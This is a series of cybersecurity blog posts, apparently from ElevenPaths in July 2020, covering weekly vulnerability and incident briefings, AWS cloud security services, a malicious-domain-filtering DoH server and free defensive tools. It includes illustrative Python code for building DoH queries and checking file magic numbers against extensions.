Microsoft's monthly patch release includes a fix for CVE-2020-1350 (known as SIGRed), with a CVSS v3 score of 10. This is a critical flaw in Windows DNS Server whose exploitation could allow an attacker to execute code remotely in Windows domain environments, especially on unpatched domain controllers, which commonly run the DNS Server role. Improper handling of requests leads to potential execution of arbitrary code in the context of the Local System account. Updating urgently according to the manufacturer's instructions is strongly recommended.

Link: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350

Adobe fixes 13 vulnerabilities

Adobe has released software updates to patch a total of 13 new security vulnerabilities affecting 5 of its widely used applications: Adobe Creative Cloud Desktop Application, Adobe Media Encoder, Adobe Genuine Service, Adobe ColdFusion and Adobe Download Manager. Of these 13 vulnerabilities, 4 are rated critical and 9 important. None of the vulnerabilities fixed in this batch of Adobe updates were publicly disclosed or exploited in the wild.

  • Adobe Creative Cloud Desktop Application versions 5.1 and earlier for Windows contain four vulnerabilities, one of which is a critical symlink issue (CVE-2020-9682) leading to arbitrary file system writes.
  • Adobe Media Encoder contains two critical arbitrary code execution issues (CVE-2020-9650 and CVE-2020-9646) and one important information disclosure issue, affecting both Windows and macOS users running Media Encoder version 14.2 or earlier.
  • Adobe Download Manager has been found vulnerable to a single flaw (CVE-2020-9688) that is critical in severity and could lead to arbitrary code execution in the current user’s context through a command injection attack.
  • Finally, Adobe Genuine Service and Adobe ColdFusion suffered important-severity privilege escalation issues.

Link: https://helpx.adobe.com/security.html

Cisco security updates

Cisco has published patches for up to 31 vulnerabilities in its products, 5 of them considered critical, 11 high and 15 medium:

  • CVE-2020-3330 CVSS 9.8: Default static passwords in Cisco Small Business RV110W Wireless-N Firewall VPN could allow an unauthenticated, remote attacker to take full control of the device with a high-privileged account.
  • CVE-2020-3323 CVSS 9.8: Vulnerability in Cisco Small Business RV110W, RV130, RV130W and RV215W that could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device due to improper validation of user-supplied input in the web-based management interface.
  • CVE-2020-3144 CVSS 9.8: Vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, RV130 VPN Router, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router that could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary commands with administrative privileges on an affected device.
  • CVE-2020-3331 CVSS 9.8: Flaw in the RV110W and RV215W series routers that could allow the execution of arbitrary code due to improper validation of user-supplied input by the web-based management interface.
  • CVE-2020-3140 CVSS 9.8: Vulnerability in the Cisco Prime License Manager (PLM) product that could allow an unauthenticated, remote attacker to gain administrative-level privileges on the affected system.

According to the Cisco Product Security Incident Response Team (PSIRT), they are not aware of any public announcements or malicious use of these vulnerabilities.

Securing your Cloud Native Applications in AWS in the New Normal

Pablo Alarcón Padellano    Katterine Nodarse Morales    Emilio Sánchez de Rojas Rodríguez de Zuloaga    16 July, 2020

The New Cloud Adoption Reality

Yes, we are facing a New Normal, and we are living a new cloud adoption reality as well. Enterprise cloud adoption has accelerated in the face of Covid-19, which has radically transformed how businesses view the cloud opportunity: the pandemic may have caused some enterprises to re-evaluate their public cloud strategies as remote ways of working become embedded in accepted operational procedures. Attitudes toward the cloud today are driven by innovation and risk reduction, both of which have come into focus during the current crisis.

Yet while cloud adoption offers a powerful opportunity to unlock business value, there remains notable hesitation around the challenges of this transition. Cybersecurity concerns remain a significant barrier. Cloud Service Providers (CSPs) play an important role in improving security and in making sure users understand and have what they need to run cloud native applications, but they do not take responsibility for security beyond what they promise in their agreements. End users have important security responsibilities of their own to ensure cloud native security and to protect their cloud environments and workloads, especially those that CSPs cannot effectively secure because they fall outside their scope.

Security Challenges in the New Paradigm

Under the AWS shared responsibility model, AWS provides a secure global infrastructure and foundational compute, storage, networking and database services, as well as higher-level services. AWS provides a range of security services and features that you can use to secure your assets. As an AWS customer you are responsible for protecting the confidentiality, integrity and availability of your data in the cloud, and for meeting specific business requirements for information protection, which brings a new governance model. Enterprises are migrating their legacy applications and developing new cloud native applications to generate value for the business, and to achieve that it is imperative to secure them according to this shared responsibility model.

One of the fundamental paradigm shifts is that proper configuration is key to securing the basic AWS capabilities and services that support these native applications. Furthermore, it is fundamental to ensuring an adequate security posture and compliance with corporate security policies. Cloud misconfiguration remains one of the main causes of data breaches in the cloud.

The flexibility and scalability of cloud services and workloads have fostered the adoption of DevOps methodologies for cloud native applications, which make cloud environments more dynamic and force companies to include security in these processes in order to protect applications throughout their complete lifecycle without affecting release speed and time-to-market goals.

Security teams are responsible for addressing these challenges to achieve a secure cloud infrastructure, and that requires continuous visibility of the configuration of assets and services, of data, and of the activity of the users, services and workloads running on top, in order to apply the required security measures.

Trusted Partner

The challenges of cloud security are complex, so it is essential to work with expert and trusted partners who have the knowledge and skills to guide and supervise the security of your cloud processes. CSPs cannot predict how every individual customer will use their environment; only customers know the intricacies of what they put in the cloud. With the current shortage of cybersecurity skills, it is difficult for security teams to find the right talent to keep their organization safe.

Most cloud customers are not fulfilling their shared responsibility for security. If you unfortunately lack sufficient means, because of a shortage of skilled personnel and/or budget, to exercise that protection responsibility and to minimize the risks derived from the continuous development and launch of the applications that support your business, what can you do?

At ElevenPaths we can help you raise the security posture of your AWS infrastructure and services, allowing you to gain the control and confidence you need to run your business securely. We promote three fundamental areas to position ourselves as your expert partner in cloud security:

  1. Knowledge: through specialized training of our professionals, test laboratories, etc. We have accredited professionals in the design, implementation, operation and management of native cloud security, aligned with your business;
  2. Tools: We have a wide portfolio of tools (services and capabilities) supported by the best technologies from our security partners to guarantee the best possible protection; and
  3. Proven experience: with CSPs, our security partners and our customers, thanks to our proven experience in deployed security projects and services.

Two months ago we excitedly announced that we had achieved AWS Security Competency status, as APN Consulting Partner providing expert guidance to AWS customers on how to leverage security tools and embed best practices into every layer of their environment. Achieving the AWS Security Competency differentiates ElevenPaths as an AWS APN member that provides specialized security engineering and consulting services designed to help enterprises adopt, develop and deploy complex security projects on AWS.

How Can We Help You Secure Your AWS Deployments?

ElevenPaths’ Cloud Security value proposition, a best-in-class, integrated and end-to-end cloud security offering, covers security topics such as identifying, categorizing and protecting your assets on AWS, managing access to AWS resources using accounts, users and groups, and suggesting ways you can secure your data, applications and overall infrastructure in the cloud.

Our AWS Certified Security Specialty experts are fully skilled to design, deploy and manage AWS’s innovative cloud-native security features, including the controls in the AWS environment and some of the products and features that AWS makes available to customers, alongside best-of-breed ISV security solutions, helping you move critical workloads securely to the public cloud while maintaining compliance and governance.

We help you define and implement a strategy that will enable you to achieve your cloud security goals. To carry out this strategy, based on three axes – implementation of control frameworks for cloud governance, monitoring and tracking and establishment of the security operating model – we have the following capabilities:

  • ElevenPaths provides specialized security engineering and consulting services to help you design, develop and deploy complex security projects on AWS. Our certified AWS Security specialists help you define a holistic AWS security model and implement controls for visibility and compliance monitoring:
    • Definition and implementation of Control Frameworks aimed at AWS environments, aligned with your organization’s governance model and able to be continuously monitored.
    • Assessment of your security posture in AWS (ElevenPaths CSAx: Cloud Security Assessment Express), enabling you to understand your current security posture, analysing its context and proposing actions for improvement.
    • Design and build of the cloud security platform that best meets your needs to monitor the security controls, enable threat detection, protect against data leakage and take advantage of related security information, building in the foundations of AWS cloud-native controls like CloudTrail, Security Groups, GuardDuty and many more, to secure your cloud architecture combined with advanced ISV security solutions.
  • ElevenPaths provides Managed Cloud Security Services on AWS to monitor your security posture and protect your critical workloads deployed on AWS:
    • Cloud Managed Security Services for AWS (Cloud MSS), which provide comprehensive visibility into your cloud assets, network security and native service configuration in order to identify inherent risks, enforce compliance requirements and governance standards, and identify security incidents in close to real time, providing automated alerting and automated response for specific use cases.
    • Secure DevOps will allow the inclusion of security into the DevOps process in your native Cloud application pipeline and toolchain in order to automate Guardrails for secure infrastructure (IaC), workloads and application deployment in a continuous improvement process.

ElevenPaths Is Well-Positioned to Secure Your AWS Applications

The ElevenPaths Cloud Security offering and value proposition is based on the deep expertise of our professionals and on proven success securing every stage of cloud adoption, from initial migration through ongoing day-to-day management. With ElevenPaths’ Cloud Security for AWS, your organization is not only getting the most advanced cloud managed security service, but also a trusted security advisor and AWS Consulting Partner to help you as an extension of your own team. Together we are stronger.

New ElevenPaths DoH Server (Beta) That Filters Out Malicious Domains

Innovation and Laboratory Area in ElevenPaths    15 July, 2020

From the ElevenPaths Innovation and Laboratory Area we have created our own DoH server (beta) that filters out malicious domains thanks to our intelligence system. As well as improving the user’s security, it also safeguards their privacy.

It is very easy to use thanks to our Firefox extension. As it is a beta version, we cannot guarantee SLAs, but our tests have been satisfactory enough to be able to release it publicly.

For more information, and to download the DoH server, visit https://doh-beta.e-paths.com.

How Do You Use It?

Like for any other DoH, it is necessary to modify your Chrome or Firefox settings. If you use Firefox, it is as simple as installing our extension from https://easydoh.e-paths.com, which already has our server built in.

Soon, it will also be possible to use it from https://thethe.e-paths.com as a plugin to check for malicious domains.

What Are The Advantages?

This server filters out malicious domains that come from our intelligence systems. There is still a lot to improve, but we will do it in a transparent way and we hope that it will be increasingly more effective.

What Is DoH?

Some time ago, the IETF (Internet Engineering Task Force) published the RFC proposal for DNS over HTTPS, which is about resolving domain names through the well-known HTTPS protocol.

This technology goes further than it may seem, for two reasons: firstly, because it is a new resolution paradigm that changes the foundations of the network, and secondly, because the backing of an RFC, together with the interest shown by browsers (eager for the power this grants them), has led them to launch their implementations in record time.
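As an added illustration of the resolution mechanism the article describes (example code, not the ElevenPaths server or extension), the RFC in question (RFC 8484) carries an ordinary DNS wire-format message inside an HTTPS request, here in its GET form with the message base64url-encoded in the dns parameter. The /dns-query path is an assumption taken from the RFC’s own examples; the page only names the host doh-beta.e-paths.com.

```python
import base64
import struct

# Assumed endpoint: the article only names the host; "/dns-query" is the path
# RFC 8484's examples use, not something the page states.
DOH_ENDPOINT = "https://doh-beta.e-paths.com/dns-query"

QTYPE_A = 1
CLASS_IN = 1


def build_query(name, qtype=QTYPE_A, txid=0):
    """Encode a single-question DNS message in RFC 1035 wire format.
    RFC 8484 recommends id 0 so identical questions give identical HTTPS
    requests, which lets HTTP caches work."""
    flags = 0x0100  # RD=1: ask the DoH resolver to recurse
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, CLASS_IN)


def doh_get_url(query, endpoint=DOH_ENDPOINT):
    """GET form of a DoH request: ?dns=<base64url, padding stripped>."""
    encoded = base64.urlsafe_b64encode(query).rstrip(b"=").decode("ascii")
    return f"{endpoint}?dns={encoded}"


def decode_doh_get(url):
    """Inverse of doh_get_url: what the server does with the dns= parameter."""
    encoded = url.split("?dns=", 1)[1]
    padded = encoded + "=" * (-len(encoded) % 4)
    return base64.urlsafe_b64decode(padded)


def _read_name(msg, offset):
    """Read a possibly compressed domain name; return (name, next offset)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:  # compression pointer (RFC 1035 4.1.4)
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped = True
            offset = pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), end if end is not None else offset


def parse_response(msg):
    """Return the rcode and any A records from a DNS response message."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    rcode = flags & 0x000F  # 0 = NOERROR, 3 = NXDOMAIN, 5 = REFUSED
    offset = 12
    for _ in range(qdcount):
        _, offset = _read_name(msg, offset)
        offset += 4  # skip QTYPE and QCLASS
    answers = []
    for _ in range(ancount):
        name, offset = _read_name(msg, offset)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        offset += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((name, ".".join(str(b) for b in rdata), ttl))
    return {"id": txid, "rcode": rcode, "answers": answers}


def constructed_response(name, ip=None, rcode=0):
    """Constructed sample of a resolver's reply (not captured traffic)."""
    flags = 0x8180 | rcode  # QR=1, RD=1, RA=1
    question = build_query(name)[12:]
    if ip is None:  # e.g. NXDOMAIN: no answer section
        return struct.pack("!HHHHHH", 0, flags, 1, 0, 0, 0) + question
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, CLASS_IN, 300, 4) + rdata
    return struct.pack("!HHHHHH", 0, flags, 1, 1, 0, 0) + question + answer
```

Sending the URL with an Accept: application/dns-message header and feeding the response body to parse_response completes the round trip; how the beta server answers for a domain its intelligence system has flagged is not stated on the page, so the NXDOMAIN sample above is only a constructed illustration of one common resolver behaviour.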

You can find more information about DoH here.

Cybersecurity Weekly Briefing July 4-10

ElevenPaths    10 July, 2020

RCE Vulnerability in F5’s BIG-IP (CVE-2020-5902)

Last Wednesday a new critical Remote Code Execution vulnerability (CVE-2020-5902, CVSSv3 10) was published for F5’s Traffic Management User Interface (TMUI). This vulnerability allows unauthenticated attackers, or authenticated users, with network access to the TMUI through the BIG-IP management port and/or Self IPs to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. It may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected. F5 recommends updating to a corrected version of this software, especially since the first attempts to exploit this flaw have been made public and Metasploit has added a PoC to its exploitation framework. Moreover, US Cybercom urged last Friday to patch without delay. For those unable to apply F5’s patch, the company has indicated a series of temporary mitigating measures. Meanwhile, researchers have begun sharing rules for the detection of exploitation attempts in IDS systems, which may be useful to verify that everything is working correctly after patching and to rule out any exploitation attempts. A few days after the flaw became public, security researchers Chase Dardaman and Rich Mirch, together with the CriticalStart TeamAres, found a bypass allowing exploitation of the bug on devices where the mitigation measures had been implemented. Successful exploitation of BIG-IP devices allows attackers to fully compromise the system, obtain user credentials, or move laterally into the device’s internal network. The researchers who uncovered this bypass are working with the F5 Security Incident Response Team (SIRT) to update the CVE-2020-5902 security advisory.

More details: https://support.f5.com/csp/article/K52145254

Attacks against Managed Service Providers (MSPs)

The US Secret Service sent out a security alert in June warning the US public and private sectors about an increase in attacks against managed service providers (MSPs). These providers offer remote management software for companies, built around a server-client architecture that would enable an attacker with access to the server to view and manipulate data on the clients’ systems. The alert reports the identification of attacks following this pattern to compromise point-of-sale systems, to perform business email compromise (BEC) scams, and to deploy ransomware (malware families such as Sodinokibi/REvil are known to make use of this entry vector). Some days after the warning was released, the popular MSP platform ConnectWise fixed an Automate API flaw that had been abused in several intrusions.

More info: https://www.zdnet.com/google-amp/article/us-secret-service-reports-an-increase-in-hacked-managed-service-providers-msps/

DXC identifies ransomware attack involving its Xchanging subsidiary

Global IT services and solutions provider DXC Technology announced over the weekend a ransomware attack on systems of its Xchanging subsidiary. Xchanging is known as a managed service provider for businesses in the insurance industry, but its list of customers includes companies from other fields. The company reported the incident on July 5th, expressing confidence that it did not spread outside Xchanging’s network. It is unclear when the company detected the attack, but so far the investigation has not revealed any indication of data being affected. The number of customers affected has not been disclosed and, as usual with such incidents, the company is working with law enforcement and authorities on the investigation. No information about the ransomware family used in the attack has been revealed yet.

Learn more: https://www.dxc.technology/newsroom/press_releases/149112-dxc_identifies_ransomware_attack_on_part_of_its_xchanging_environment

Banking Trojan Cerberus Discovered on Google Play

The Avast cybersecurity team has published a report on the detection of a Cerberus banking Trojan on Google Play targeting Android users in Spain. According to the researchers, this malicious software had remained hidden in an application called “Calculadora de Moneda”. This application was accepted on Google Play sometime last March and, although at first it did not cause any harm to the victims, once it had gained the users’ trust the application started to activate code that allowed it to connect to a Command & Control server. From there, the C&C instructed the application to download an additional APK to the affected devices: Cerberus. Among the features of this tool are the ability to create overlays on legitimate banking applications in order to exfiltrate the victim’s credentials, and to read SMS messages to obtain one-time access codes or details of the second authentication factor. It is estimated that the malicious application was downloaded more than 10,000 times.

Details: https://blog.avast.com/avast-finds-banking-trojan-cerberus-on-google-play-avast

New Vulnerability in PAN-OS

Just one week after fixing a critical vulnerability in PAN-OS (CVE-2020-2021), Palo Alto Networks has fixed a new serious flaw in PAN-OS GlobalProtect. This is a command injection vulnerability in the operating system that would allow an unauthenticated remote attacker to execute arbitrary operating system commands with root privileges on unpatched devices. It has been assigned the identifier CVE-2020-2034 and a CVSS 3.x severity of 8.1, as it can be exploited by attackers with network access to vulnerable servers as part of a more complex attack that does not require user interaction. PAN-OS versions < 9.1.3, < 9.0.0, < 8.1.15, 8.0 and 7.1 are affected. The flaw cannot be exploited if the GlobalProtect portal is not enabled and, in addition, the attacker needs certain information about the firewall configuration or will need to perform some kind of brute-force attack in order to exploit the vulnerability. Telefónica is taking the appropriate action to identify and patch the vulnerability.

More: https://www.bleepingcomputer.com/news/security/palo-alto-networks-fixes-another-severe-flaw-in-pan-os-devices/

Juniper security bulletin

Yesterday, Juniper published a security bulletin that patches 19 vulnerabilities in its products. Among them, it is worth highlighting a critical vulnerability (CVSSv3 9.8) with the reference CVE-2020-1654. This issue appears when processing a malformed HTTP message and may lead to a Denial of Service (DoS) or Remote Code Execution (RCE) if the ICAP (Internet Content Adaptation Protocol) redirect service is enabled. The affected products are Juniper Networks Junos OS on SRX Series, versions 18.1, 18.2, 18.3, 18.4, 19.1, 19.2 and 19.3. To remediate the issue, it is recommended to apply the updates provided by Juniper.

Info: https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES

How to Protect Yourself from Pandemic Cyberattacks Using Free Tools

Diego Samuel Espitia    9 July, 2020

There is no doubt that this COVID-19 pandemic has changed the daily life of humanity, not only while the pandemic lasts, but forever. Many companies are seeking to implement teleworking as a permanent method for their employees.

This is increasing the time we spend connected, as observed in the connectivity statistics from the months of confinement and beyond, opening up multiple possibilities for users and employers who need to use technology for everyday things such as food shopping. However, this is also a great opportunity for cybercriminals to carry out scam-based attacks, which we have discussed in previous articles and which Microsoft has reported as very serious on its security blog.

In many articles we have been told about the consequences of these risks materializing, but in many cases we do not know which tools we should set up or how to mitigate them. In this article we will see what free tools we can use and what they protect us from.

Attacks While Surfing the Internet

When using the browser, we are exposed to many different threats. When you make a typing mistake or are hit by a DNS attack, you may end up on a fraudulent website. When you are at home, without a corporate protection system, such sites are very difficult to detect.

To avoid this, it is necessary to set up a system that counters DNS (Domain Name System) spoofing attacks, in which the name requested in the browser is manipulated so that you are taken to a fraudulent site, whether because of a typing error or by following a malicious link.

In Firefox, all you have to do is install our EasyDoH extension, recently updated to simplify the configuration of the DNS server that the user wants to use. With a simple configuration in the extension, we can see in the following image how it protects from malicious sites:

EasyDoH configuration

The second threat is when some malicious executable on a website runs a process without “touching the disk”. This means that, without us downloading or directly executing anything, it performs actions from the browser’s memory. This is a very critical threat because, since nothing reaches the disk, protection systems such as antivirus or endpoint response tools cannot detect it.

For this we have recently developed an extension that, like the previous one, only needs to be installed for the browser to start controlling this threat. This extension is called AMSIext and is available for Chrome and Firefox. Once installed, it connects the browser to the system called AMSI, which allows programs that are about to run in memory to be validated before their execution.

File-Based Attacks

There is no doubt that file-based scams are one of the techniques most widely used by cybercriminals and have increased significantly in recent times. Criminals use two mechanisms that, although they seem simple, are very effective in bypassing some of our PC’s controls.

  1. The first technique we are going to focus on is the change of file extensions. Windows trusts file extensions too much: for example, if the extension is .docx, it opens the file with MS Word regardless of the content. To avoid this risk, we have developed a program that validates that the extension matches the file’s Magic Numbers (a forensic technique for identifying a file’s real type).

    This program called MEC only needs to be installed on your computer and, automatically, every time the user tries to open a file, the system compares the Magic Numbers with the extension. If they do not match, the program shows the user that the file cannot be opened with the program that the extension suggests.
  2. The second file-based threat that has increased exponentially in recent months is malware hidden within macros and JavaScript in MS Word, MS Excel and PDF documents. In this case, if users open the files and grant execution permissions, they are actually opening the door for cybercriminals to execute actions on or connect to the machine.

    To combat this type of threat we have developed DIARIO, a free tool for users to check all documents they receive by email or download from the Internet before opening them, and thus validate whether or not they contain malicious macros. To protect users’ privacy, DIARIO’s artificial intelligence only uses the macro for analysis, protecting the sensitive information that the file may contain.

    The tool can be used directly on the website, or you can download the installer for your machine’s operating system. The suspicious file is uploaded and the tool then reports whether or not it contains any executable content and whether or not it is malicious, as can be seen in the image below:
How DIARIO works
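As an added illustration of the magic-number check behind the first tool (example code, not MEC’s implementation), the snippet below compares the extension Windows would trust against the file’s leading bytes, and looks inside ZIP-based Office files to tell a .docx from a plain archive. The signature table is a constructed subset of well-known magic numbers and the sample files are constructed inline.

```python
import io
import os
import zipfile

# Constructed signature table (assumption: a small subset of well-known magic
# numbers, not the table the MEC tool itself uses).
SIGNATURES = [
    (b"%PDF-", {".pdf"}),
    (b"\x89PNG\r\n\x1a\n", {".png"}),
    (b"\xff\xd8\xff", {".jpg", ".jpeg"}),
    (b"MZ", {".exe", ".dll", ".scr"}),  # Windows PE executable
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", {".doc", ".xls", ".ppt"}),  # OLE2
    (b"PK\x03\x04", None),  # ZIP container: refined by looking inside
]


def _zip_based_type(data):
    """A .docx/.xlsx/.pptx is a ZIP; inspect its entries to tell which."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            names = archive.namelist()
    except zipfile.BadZipFile:
        return set()  # starts with PK but is not a readable archive
    if "[Content_Types].xml" not in names:
        return {".zip", ".jar"}
    if any(n.startswith("word/") for n in names):
        return {".docx", ".docm"}
    if any(n.startswith("xl/") for n in names):
        return {".xlsx", ".xlsm"}
    if any(n.startswith("ppt/") for n in names):
        return {".pptx", ".pptm"}
    return {".zip"}


def expected_extensions(data):
    """Extensions consistent with the content's magic number (empty = unknown)."""
    for magic, exts in SIGNATURES:
        if data.startswith(magic):
            return exts if exts is not None else _zip_based_type(data)
    return set()


def extension_matches(filename, data):
    """True when the declared extension agrees with what the bytes say."""
    ext = os.path.splitext(filename)[1].lower()
    return ext in expected_extensions(data)


def make_sample_docx():
    """Constructed minimal Office Open XML container (not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<document/>")
    return buf.getvalue()


if __name__ == "__main__":
    samples = {  # constructed inputs
        "report.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",
        "notes.docx": make_sample_docx(),
        "invoice.docx": b"MZ\x90\x00" + b"\x00" * 60,  # executable renamed .docx
    }
    for name, data in samples.items():
        verdict = "OK" if extension_matches(name, data) else "MISMATCH"
        looks = sorted(expected_extensions(data)) or ["unknown"]
        print(f"{name}: {verdict} (content looks like {looks})")
```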

As we can see, we have several free and simple tools to significantly increase our security levels, closing the door to the most common attacks currently being executed. Nowadays, we are all searching for information, so cybercriminals take advantage of the circumstances to make a profit and attack us. This is why it is necessary to be more protected than ever.